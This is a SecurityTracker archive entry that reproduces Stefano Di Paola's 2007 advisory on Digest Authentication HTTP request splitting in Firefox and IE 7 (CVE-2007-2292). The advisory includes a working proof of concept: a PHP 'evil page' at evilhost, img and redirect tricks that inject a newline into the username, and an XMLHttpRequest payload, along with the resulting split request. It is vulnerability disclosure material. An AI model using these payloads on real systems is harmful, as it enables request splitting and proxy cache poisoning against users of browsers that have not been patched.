Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Mozilla Firefox Digest Authentication Bug Lets Remote Users Conduct HTTP Request Splitting Attacks
|
|
SecurityTracker Alert ID: 1017968
|
|
SecurityTracker URL: http://securitytracker.com/id?1017968
|
|
CVE Reference: CVE-2007-2292
(Links to External Site)
|
Updated: Oct 19 2007
|
Original Entry Date: Apr 26 2007
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: Mozilla Foundation Security Advisory
|
Version(s): prior to 2.0.0.8
|
Description: A vulnerability was reported in Mozilla Firefox. A remote user can conduct HTTP request splitting attacks.
A remote user (server) can return a specially crafted HTTP Digest Authentication value to cause the target client to generate a split
request.
Stefano `Wisec` Di Paola discovered this vulnerability.
The original advisory is available at:
http://www.wisec.it/vulns.php?id=3D11
|
Impact: A remote server can send an HTTP response that will cause an arbitrary request to be generated by the target user's browser.
|
Solution: The vendor has issued a fixed version (2.0.0.8).
The Mozilla advisory is available at:
http://www.mozilla.org/security/announce/2007/mfsa2007-31.html
|
Vendor URL: www.mozilla.org/security/announce/2007/mfsa2007-31.html (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Stefano Di Paola <stefano.dipaola@wisec.it>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 25 Apr 2007 19:37:26 +0200
From: Stefano Di Paola <stefano.dipaola@wisec.it>
Subject: IE 7 and Firefox Browsers Digest Authentication Request Splitting
|
--=-WNc9H/gvU4cW4Iv3wuFA
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Title IE 7 and Firefox Browsers Digest Authentication
Request Splitting
Systems Affected Internet Explorer 7.0.5730.11
FF 2.0.0.3
Severity Medium
Vendor http://www.microsoft.com/ & http://www.mozilla.com
Advisory http://www.wisec.it/vulns.php?id=3D11
Authors Stefano `Wisec` Di Paola (stefano.dipaola@wisec.it)
Discovery Date 20070213
Release Date 20070425
I) Short description
Firefox and Internet Explorer are prone to Http Request Splitting when
Digest Authentication occurs. If anyone wants to know about HTTP Request
Splitting, HTTP Request Splitting attacks are described in various
papers and advisories:
1. http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
2.
http://www.webappsec.org/lists/websecurity/archive/2006-07/msg00069.html
3. http://download2.rapid7.com/r7-0026/
4. http://www.wisec.it/docs.php?id=3D4=20
(About Auto Injection with Req.Split.)
II) Long description
As explained in Rfc2617 (http://www.ietf.org/rfc/rfc2617.txt) Digest
Authentication is a more secure way to exchange user credentials.
Rfc uses the following example:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
The first time the client requests the document, no Authorization
header is sent, so the server responds with:
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest
realm=3D"testrealm@host.com",
qop=3D"auth,auth-int",
nonce=3D"dcd98b7102dd2f0e8b11d0f600bfb0c093",
opaque=3D"5ccc069c403ebaf9f0171e9517f40e41"
The client may prompt the user for the username and password, after
which it will respond with a new request, including the following
Authorization header:
Authorization: Digest username=3D"Mufasa",
realm=3D"testrealm@host.com",
nonce=3D"dcd98b7102dd2f0e8b11d0f600bfb0c093",
uri=3D"/dir/index.html",
qop=3Dauth,
nc=3D00000001,
cnonce=3D"0a4f113b",
response=3D"6629fae49393a05397450978507c4ef1",
opaque=3D"5ccc069c403ebaf9f0171e9517f40e41"
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
So there's a response by the client (browser) with username in clear.
There are two ways to send credentials in html/javascript:
XMLHttpRequest("GET","page",async, "user","pass");
And with img/iframes or related:
<img src=3D"http://user:pass@host/paget">
But what if the username contains \r\n or urlencoded %0d%0a?
Let's use an Evil page like this:
--8<-- http://evilhost/req.php --8<--8<--8<--8<--8<--8<--8<--8<--8<--
<?php
header('Set-Cookie: PHPSESSID=3D6555');
if((int)intval($_COOKIE['PHPSESSID']) !=3D=3D 6555){
header('HTTP/1.0 401 Authorization Required");
header('WWW-Authenticate: Digest realm=3D"1@example.com", \
qop=3D"auth,auth-int", nonce=3D"dcd98b7102dd2f0e8b11d0f600bfb0c093",\
opaque=3D"5ccc069c403ebaf9f0171e9517f40e41"');
header('Proxy-Connection: keep-alive');
} else {
// header("Set-Cookie: PHPSESSID=3D0");
header('Connection: keep-alive');
?>
<html><head>
<meta http-equiv=3D'Connection' content=3D"keep-alive"></head>
<body><script>
// Some Printing in order to show document DOM properties
// in the poisoned page
for(var i in document)
document.write(i+' '+eval('document.'+i)+'<br>');
</script>
</body>
</html>
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
Which asks for a digest authentication only once.
III) Direct URL Authentication
Let's try it with Firefox:
<img id=3D"d" src=3D"http://user%0aname:pp@evilhost/req.php">
Let's see what happens after the first request:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
HTTP/1.1 401 Authorization Required
Set-Cookie: PHPSESSID=3D6555
WWW-Authenticate: Digest realm=3D"1@example.com",
qop=3D"auth,auth-int",nonce=3D"dcd98b7102dd2f0e8b11d0f600bfb0c093",\
opaque=3D"5ccc069c403ebaf9f0171e9517f40e41"
Proxy-Connection: keep-alive
Connection: keep-alive, Keep-Alive
Content-Length: 146
Keep-Alive: timeout=3D15, max=3D100
Content-Type: text/html; charset=3DUTF-8
...
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
and then Firefox resend its request:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
GET req.php HTTP/1.1
Host: at.tack.er
User-Agent: Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3)
Gecko/20060601 Firefox/2.0.0.3 (Ubuntu-edgy)
Keep-Alive: 300
Connection: keep-alive
Authorization: Digest username=3D"user
name", realm=3D"1@example.com",
nonce=3D"dcd98b7102dd2f0e8b11d0f600bfb0c093", uri=3D"/req.php",
response=3D"e398c5c7583b4ca115978c486bb766f8",
opaque=3D"5ccc069c403ebaf9f0171e9517f40e41", qop=3Dauth, nc=3D00000001,
cnonce=3D"58e1c23271698745"
Cookie: PHPSESSID=3D6555
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
Everyone can see there's a splitting where the %0a was.
The rest of the story is straightforward, an attacker could inject a
second request, and in presence of a proxy (about 2 million people use
it), a request splitting attack could be accomplished.=20
IV) Firefox Add-On
A redirection could be used:
<img src=3D"http://evilhost/redir.php">
With redir.php :
<?php
header("Location: http://user%0aname:ds@avilhost/req.php");
?>
Or by using various redirectors around the web.
Note: Internet Explorer 7 is not vulnerable with imgs nor with other
direct requests.
V) XMLHttpRequest Authentication
IE 7 and Firefox are both vulnerable.=20
Let's use a standard request with XMLHttpRequest:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
x=3Dnew XMLHttpRequest();
x.open("POST","req.php?",false,"user\r\nname","pass");
x.setRequestHeader("Proxy-Connection","keep-alive");
x.onreadystatechange=3Dfunction (){
if (x.readyState =3D=3D 4){
}
// The payload with a request to a page with evil content
x.send("RequestPayload");
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<
--8<--8<--
This will result in a similar splitting like the one with images tags.
What you could do with these splittings? A lot, one for all is that in
presence of a proxy, local cache could be poisoned. But for some more
attack have a look at references.
Note: there is some difference between IE and Firefox, but i'll let you
as homework
CREDIT
------
Stefano di Paola is credited with the discovery of this vulnerability.
LEGAL NOTICES
--------------
Copyright (c) 2007 Stefano di Paola
Note: this exploit is DUAL LICENSED,=20
1. if you'll use it for personal and non-profit purposes you can=20
apply GPL v2 and above.=20
=20
2. In the case you plain to:=20
a. use our code in any commercial context
b. implement this code in your non-GPL application
c. use this code during a Penetration Test
d. make any profit from it=20
=20
you need to contact me in order to obtain a _commercial license_.
For more Informations about Dual Licensing:
http://producingoss.com/html-chunk/dual-licensing.html
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
--=20
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer
Web: www.wisec.it
..................
--=-WNc9H/gvU4cW4Iv3wuFA
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Questa =?ISO-8859-1?Q?=E8?= una parte del messaggio
firmata digitalmente
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQBGL5HWfSCEH5yFF2MRAgVfAJ47gkj/Yw0HFSzizk4Hi+AWe5aiQgCbBfTQ
Pyi025+kLyUB6oT1919PDi4=
=cwhV
-----END PGP SIGNATURE-----
--=-WNc9H/gvU4cW4Iv3wuFA--
|
|
Go to the Top of This SecurityTracker Archive Page
|
